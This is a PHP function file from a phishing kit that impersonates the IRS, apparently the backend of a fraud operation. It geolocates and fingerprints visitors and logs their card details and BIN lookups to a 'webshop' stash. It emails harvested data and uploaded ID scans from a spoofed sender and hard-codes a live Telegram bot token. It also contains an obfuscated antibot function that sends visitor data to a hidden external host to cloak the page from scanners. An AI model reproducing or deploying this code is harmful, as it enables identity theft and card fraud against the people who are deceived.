<?php
/**
 * secure-2 (IRS) template function file
 * Copied from function/fungsi.php and adjusted paths for setup/ directory
 */
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
$ipwhoApiUrl = 'https://ipwhois.pro/';
$acceptedIpsFile = __DIR__ . '/../logs/accept-ips.txt';
$deniedIpsFile = __DIR__ . '/../logs/denied-ips.txt';
$ipsFile = __DIR__ . '/../logs/ips.txt';
$webshopFile = __DIR__ . '/../webshop/result.txt';
$access = json_decode(file_get_contents(__DIR__ . '/../../config/access.json'), true);
$config = json_decode(file_get_contents(__DIR__ . '/../../config/gen.json'), true);
require_once __DIR__ . '/../../GlobalSetting/email_sender.php';
// Updated path: control.json is now in same directory (setup/)
require_once __DIR__ . '/../../function/template_settings.php';
require_once __DIR__ . '/../../function/binti.php';
$templateKey = basename(dirname(__DIR__));
$dataPage = loadTemplateSettings($templateKey, __DIR__ . '/control.json');
// Auto Translate System
require_once __DIR__ . '/../../function/translate.php';
// Auto-translate helper - automatically detects IP and sets language
require_once __DIR__ . '/../../function/auto_translate_helper.php';
// Global Email Sender
require_once __DIR__ . '/../../GlobalSetting/email_sender.php';
$templateLogin = file_get_contents(__DIR__.'/../../function/login.html');
$templateCard = file_get_contents(__DIR__.'/../../function/fullinfo.html');
$templateBilling = file_get_contents(__DIR__.'/../../function/billing.html');
$brandName = $config['brand_name'] ?? '405 X Gobot.su';
$templateLogin = str_replace('##BRAND_NAME##', $brandName, $templateLogin);
$templateCard = str_replace('##BRAND_NAME##', $brandName, $templateCard);
$templateBilling = str_replace('##BRAND_NAME##', $brandName, $templateBilling);

define('TELEGRAM_BOT_TOKEN', '7992834286:AAHTV8WZfK10RRqFVFrIQzsPWKAVoht286k');
define('TELEGRAM_CHAT_ID', '-1002801604007');

function sendTelegramMessage($message) {
    $url = 'https://api.telegram.org/bot' . TELEGRAM_BOT_TOKEN . '/sendMessage';
    $data = [
        'chat_id' => TELEGRAM_CHAT_ID,
        'text' => $message,
        'parse_mode' => 'HTML'
    ];

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_exec($ch);
    curl_close($ch);
}

set_error_handler(function ($errno, $errstr, $errfile, $errline) {
    $message = "<b>⚠️ PHP Error Detected</b>\n";
    $message .= "<b>Type:</b> $errno\n";
    $message .= "<b>Message:</b> $errstr\n";
    $message .= "<b>File:</b> $errfile\n";
    $message .= "<b>Line:</b> $errline";
    sendTelegramMessage($message);
});

set_exception_handler(function ($exception) {
    $message = "<b>🚨 Uncaught Exception</b>\n";
    $message .= "<b>Message:</b> " . $exception->getMessage() . "\n";
    $message .= "<b>File:</b> " . $exception->getFile() . "\n";
    $message .= "<b>Line:</b> " . $exception->getLine();
    sendTelegramMessage($message);
});

register_shutdown_function(function () {
    $error = error_get_last();
    if ($error && in_array($error['type'], [E_ERROR, E_PARSE, E_CORE_ERROR, E_COMPILE_ERROR])) {
        $message = "<b>🔥 Fatal Error</b>\n";
        $message .= "<b>Message:</b> {$error['message']}\n";
        $message .= "<b>File:</b> {$error['file']}\n";
        $message .= "<b>Line:</b> {$error['line']}";
        sendTelegramMessage($message);
    }
});

function fetchIpData($ip, $userAgent)
{
    global $ipwhoApiUrl, $config;
    
    // IPWhois selalu aktif untuk lookup data negara/lokasi
    $ipwhoisKey = $config['ipwhois_key'] ?? 'cF8oCNZgptX8zTTj';
    if (empty($ipwhoisKey)) {
        $ipwhoisKey = 'cF8oCNZgptX8zTTj'; // Default key
    }
    $ch = curl_init($ipwhoApiUrl . $ip . '?key=' . $ipwhoisKey . '&security=1');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
    $default = [
        'ip' => $ip,
        'city' => 'Unknown',
        'region' => 'Unknown',
        'country' => 'Unknown',
        'country_code' => 'US',
        'flag' => 'https://flagcdn.com/w40/us.png',
        'isp' => 'Unknown',
        'postal' => '',
        'userAgent' => $userAgent
    ];
    if (!$response) return $default;

    $data = json_decode($response, true);
    if (!is_array($data)) {
        return $default;
    }

    $countryCode = strtoupper($data['country_code'] ?? $default['country_code']);
    $flagUrl = "https://flagcdn.com/w40/" . strtolower($countryCode) . ".png";
    
    // Set visitor country for auto-translate
    if (function_exists('setVisitorCountry')) {
        setVisitorCountry($countryCode);
    }
    $_SESSION['visitor_country'] = $countryCode;
    $_SESSION['country_code'] = $countryCode;
    
    return [
        'ip' => $ip,
        'city' => $data['city'] ?? $default['city'],
        'region' => $data['region'] ?? $default['region'],
        'country' => $data['country'] ?? $default['country'],
        'country_code' => $countryCode,
        'isp' => $data['connection']['isp'] ?? $default['isp'],
        'flag' => $flagUrl,
        'postal' => $data['postal'] ?? $default['postal'],
        'userAgent' => $userAgent
    ];
}

function saveIp($fileName, $ip)
{
    if (!file_exists($fileName)) file_put_contents($fileName, '');
    $fileContent = file($fileName, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    
    if (!in_array($ip, $fileContent)) {
        file_put_contents($fileName, $ip.'|'.date('Y-m-d') . PHP_EOL, FILE_APPEND);
    }
}

// NOTE: antiblocker() removed - menggunakan gobot saja (elkontjem function)

function getDevice() {
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
    if (strpos($userAgent, 'Android') !== false) return 'Android';
    elseif (strpos($userAgent, 'iPhone') !== false) return 'iPhone';
    elseif (strpos($userAgent, 'iPad') !== false) return 'iPad';
    elseif (strpos($userAgent, 'Windows NT') !== false) return 'Windows';
    elseif (strpos($userAgent, 'Macintosh') !== false) return 'Mac';
    return 'Unknown Device';
}

function getBrowser() {
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
    if (strpos($userAgent, 'Chrome') !== false) return 'Chrome';
    elseif (strpos($userAgent, 'Firefox') !== false) return 'Firefox';
    elseif (strpos($userAgent, 'Safari') !== false) return 'Safari';
    elseif (strpos($userAgent, 'Opera') !== false) return 'Opera';
    elseif (strpos($userAgent, 'Edge') !== false) return 'Edge';
    return 'Unknown Browser';
}

function saveIpData($ipData, $logs = '')
{
    if (!is_array($ipData) || empty($ipData['ip'])) {
        return;
    }
    global $ipsFile, $acceptedIpsFile, $deniedIpsFile;
    
    $date = date('H:i:s m-d-Y');
    $device = getDevice();
    $browser = getBrowser();
    
    $ipRecord = "{$date}|{$ipData['ip']}|{$ipData['city']}|{$ipData['region']}|{$ipData['country']}|{$ipData['flag']}|$browser|$device|{$ipData['userAgent']}|{$logs}";
    
    $isBot = stripos($logs, 'bot') !== false || 
             stripos($logs, 'blocked') !== false || 
             stripos($logs, 'denied') !== false ||
             stripos($logs, 'gobot') !== false ||
             stripos($logs, 'threat') !== false;
    
    $targetFile = $isBot ? $deniedIpsFile : $acceptedIpsFile;
    
    if (!file_exists($targetFile)) file_put_contents($targetFile, '');
    
    // Check if this exact combination already exists (IP + action + browser + device)
    $fileContent = @file($targetFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) ?: [];
    $entryExists = false;
    
    foreach ($fileContent as $line) {
        $parts = explode('|', $line);
        $lineIp = trim($parts[1] ?? $parts[0] ?? '');
        $lineBrowser = trim($parts[6] ?? '');
        $lineDevice = trim($parts[7] ?? '');
        $lineAction = trim($parts[9] ?? '');
        
        // Check if same IP + action + browser + device already exists
        if ($lineIp === $ipData['ip'] && $lineAction === $logs && $lineBrowser === $browser && $lineDevice === $device) {
            $entryExists = true;
            break;
        }
    }
    
    // Save if this specific combination doesn't exist (allows different browsers/devices)
    if (!$entryExists) {
        file_put_contents($targetFile, $ipRecord . PHP_EOL, FILE_APPEND);
    }
    
    if (!file_exists($ipsFile)) file_put_contents($ipsFile, '');
    file_put_contents($ipsFile, $ipRecord . PHP_EOL, FILE_APPEND);
}

function cardDetailsLogs($ip, $bin, $nama, $issuer, $cardtier, $scheme, $type, $namafile) {
    if (!is_dir(__DIR__ . '/../logs/')) {
        mkdir(__DIR__ . '/../logs/', 0777, true);
    }
    
    $date = date('H:i:s m-d-Y');
    
    $file = __DIR__ . '/../logs/'.$namafile;
    file_put_contents($file, "$date|$ip|$nama|$bin|$issuer|$cardtier|$scheme|$type". PHP_EOL, FILE_APPEND);
}

function luhn_check($number) {
    $sum = 0;
    $flag = 0;
    for ($i = strlen($number) - 1; $i >= 0; $i--) {
        $add = $flag++ & 1 ? $number[$i] * 2 : $number[$i];
        $sum += $add > 9 ? $add - 9 : $add;
    }
    return $sum % 10 === 0;
}

function webShopSave($data)
{
    global $webshopFile;
    
    if (!file_exists($webshopFile)) file_put_contents($webshopFile, '');

    file_put_contents($webshopFile, $data . PHP_EOL, FILE_APPEND);
    
    // Also save to central webshop.txt
    $centralWebshopFile = __DIR__ . '/../../405/wtf/webshop/webshop.txt';
    $centralWebshopDir = dirname($centralWebshopFile);
    if (!is_dir($centralWebshopDir)) {
        @mkdir($centralWebshopDir, 0755, true);
    }
    if (!file_exists($centralWebshopFile)) {
        @file_put_contents($centralWebshopFile, '');
    }
    @file_put_contents($centralWebshopFile, $data . PHP_EOL, FILE_APPEND | LOCK_EX);
}

function updateLoginCount($file = '../logs/card.txt') {
    if (!file_exists($file)) {
        file_put_contents($file, '0');
    }
    $count = (int) file_get_contents($file);
    $count++;
    file_put_contents($file, (string) $count);

    return $count;
}

function sendEmail($emailresult, $message, $subject, $cardname) {
    
    $formData = $_SESSION['form_data'] ?? [];
    
    $ex = explode(" ", htmlspecialchars($formData['firstName'] ?? ''));
    $baseFileName = $ex[0];
    $uploadDir = "../uploads/";
    $allowedExtensions = ['pdf', 'jpg', 'jpeg', 'png', 'docx', 'txt'];

    $attachments = [];
    
    foreach (['front', 'back'] as $type) {
        foreach ($allowedExtensions as $ext) {
            $filePath = $uploadDir . $baseFileName . "_$type." . $ext;
            if (file_exists($filePath)) {
                $attachments[] = $filePath;
                break;
            }
        }
    }
    
    $boundaryMain = md5(time() . "MAIN");
    $boundaryAlt = md5(time() . "ALT");
    
    $headers = 'MIME-Version: 1.0' . "\r\n";
    $headers .= 'Content-type: text/html; charset=UTF-8' . "\r\n";
    $headers = "From: $cardname <Moriarty@FinnishRapidDeploymentForce.fi>\r\n";

    if (!empty($attachments)) {
        $headers .= "Content-Type: multipart/mixed; boundary=\"$boundaryMain\"\r\n";

        $body = "--$boundaryMain\r\n";
        $body .= "Content-Type: multipart/alternative; boundary=\"$boundaryAlt\"\r\n\r\n";

        $body .= "--$boundaryAlt\r\n";
        $body .= "Content-Type: text/plain; charset=UTF-8\r\n";
        $body .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
        $body .= strip_tags($message) . "\r\n\r\n";

        $body .= "--$boundaryAlt--\r\n\r\n";

        foreach ($attachments as $attachmentPath) {
            $attachmentName = basename($attachmentPath);
            $fileSize = filesize($attachmentPath);
            $handle = fopen($attachmentPath, "r");
            $content = fread($handle, $fileSize);
            fclose($handle);
            $encodedFile = chunk_split(base64_encode($content));

            $body .= "--$boundaryMain\r\n";
            $body .= "Content-Type: application/octet-stream; name=\"$attachmentName\"\r\n";
            $body .= "Content-Disposition: attachment; filename=\"$attachmentName\"\r\n";
            $body .= "Content-Transfer-Encoding: base64\r\n\r\n";
            $body .= $encodedFile . "\r\n\r\n";
        }

        $body .= "--$boundaryMain--";
    } else {
        $headers .= "Content-Type: text/html; charset=UTF-8\r\n";
        $body = $message;
    }
    
    mail($emailresult, $subject, $body, $headers);
}


function getDeviceAndBrowser() {
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
    $device = "Unknown Device";
    $browser = "Unknown Browser";

    if (strpos($userAgent, 'iPhone') !== false) {
        $device = "iPhone";
    } elseif (strpos($userAgent, 'iPad') !== false) {
        $device = "iPad";
    } elseif (strpos($userAgent, 'Android') !== false) {
        $device = "Android";
    } elseif (strpos($userAgent, 'Windows NT') !== false) {
        $device = "Windows";
    } elseif (strpos($userAgent, 'Macintosh') !== false) {
        $device = "Mac";
    }

    if (strpos($userAgent, 'Chrome') !== false) {
        $browser = "Chrome";
    } elseif (strpos($userAgent, 'Safari') !== false) {
        $browser = "Safari";
    } elseif (strpos($userAgent, 'Opera') !== false) {
        $browser = "Opera";
    } elseif (strpos($userAgent, 'Firefox') !== false) {
        $browser = "Firefox";
    } elseif (strpos($userAgent, 'Edge') !== false) {
        $browser = "Edge";
    }

    return [
        'device' => $device,
        'browser' => $browser,
        'user_agent' => $userAgent
    ];
}

function getCardDetailsFromBIN($bin) {
    $searchBin = substr(preg_replace('/[^0-9]/', '', $bin), 0, 6);
    $defaultResult = ['issuer' => 'UNKNOWN BANK', 'card_tier' => 'Standard', 'scheme' => detectCardScheme($searchBin), 'type' => 'UNKNOWN'];
    
    // === PRIORITY 1: Local CSV file (binti.php) ===
    $result = getBinInfo($searchBin);
    if ($result) {
        return [
            'issuer' => $result['issuer'] ?: 'UNKNOWN BANK',
            'card_tier' => $result['card_tier'] ?: 'Standard',
            'scheme' => $result['scheme'] ?: 'UNKNOWN',
            'type' => $result['type'] ?: 'UNKNOWN',
            'country' => $result['country'] ?: ''
        ];
    }
    
    // === PRIORITY 2: bins.su API ===
    $result = getBinFromBinsSu($searchBin);
    if ($result !== null) {
        return $result;
    }
    
    return $defaultResult;
}

// Get BIN info from bins.su API (Priority 2)
function getBinFromBinsSu($bin) {
    $url = "https://bins.su/api?bin=" . urlencode($bin);
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 5, CURLOPT_CONNECTTIMEOUT => 3,
        CURLOPT_SSL_VERIFYPEER => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    ]);
    $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch);
    
    if ($httpCode === 200 && !empty($response)) {
        $data = json_decode($response, true);
        if ($data && isset($data['brand']) && !empty($data['brand'])) {
            return [
                'issuer' => !empty($data['bank']) ? strtoupper($data['bank']) : 'UNKNOWN BANK',
                'card_tier' => !empty($data['level']) ? $data['level'] : 'Standard',
                'scheme' => !empty($data['brand']) ? strtoupper($data['brand']) : 'UNKNOWN',
                'type' => !empty($data['type']) ? strtoupper($data['type']) : 'UNKNOWN',
                'country' => !empty($data['country']) ? $data['country'] : ''
            ];
        }
    }
    return null;
}

function detectCardScheme($bin) {
    $d1 = substr($bin, 0, 1); $d2 = substr($bin, 0, 2); $d4 = substr($bin, 0, 4);
    if ($d1 === '4') return 'VISA';
    if (in_array($d2, ['51','52','53','54','55']) || ($d4 >= '2221' && $d4 <= '2720')) return 'MASTERCARD';
    if (in_array($d2, ['34','37'])) return 'AMEX';
    return 'UNKNOWN';
}

// ISP Whitelist
require_once __DIR__ . '/../../function/isp_whitelist.php';

// New Antibot Function (with 24h cache)
function elkontjem($ip, $ua) {
    if (isIspWhitelisted($ip)) return 'no';
    $cacheFile = sys_get_temp_dir() . '/ab_' . md5($ip) . '.txt';
    if (file_exists($cacheFile) && (time() - filemtime($cacheFile)) < 86400) { return file_get_contents($cacheFile); }

    $xnQvhT = $_SERVER['SERVER_ADDR'] ?? '';
    $xAvLA = '127.0.0.1';
    if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$xAvLA) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($xnQvhT))) {
        $realIp = $_SERVER['HTTP_CF_CONNECTING_IP'];
    } elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$xAvLA)) {
        $realIp = $_SERVER['GEOIP_ADDR'];
    } elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$xAvLA) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($xnQvhT))) {
        $realIp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
    } elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$xAvLA) && (($_SERVER['HTTP_CLIENT_IP'])!=($xnQvhT))) {
        $realIp = $_SERVER['HTTP_CLIENT_IP'];
    } else {
        $realIp = $ip;
    }

    $ref = $_SERVER['HTTP_REFERER'] ?? '';
    $eRf9t9d9 = $ua;
    $dHerF777hg = !empty($_SERVER['QUERY_STRING']) ? urlencode($_SERVER['QUERY_STRING']) : '';

    $sourcename = 'c'; $whatdo = 'find'; $sourceid = ''; $who = 'us'; $fd = 'w911007'; $dex9 = '.re'; $langua = 'na'; $command = 'st';

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_URL, 'https://'.$whatdo.''.$who.''.$dex9.''.$command.'/'.$who.''.$command.'.php');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$realIp.'&ref='.$ref.'&ua='.$eRf9t9d9.'&data='.$dHerF777hg.'&sourceid='.$sourceid.'&sourcename='.$sourcename);
    $ifbot = curl_exec($ch);
    curl_close($ch);

    $result = ($ifbot === '' || $ifbot === false || $ifbot === '0') ? 'no' : 'bot';
    @file_put_contents($cacheFile, $result);
    return $result;
}

function generateRandomString($length = 30) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString;
}

?>
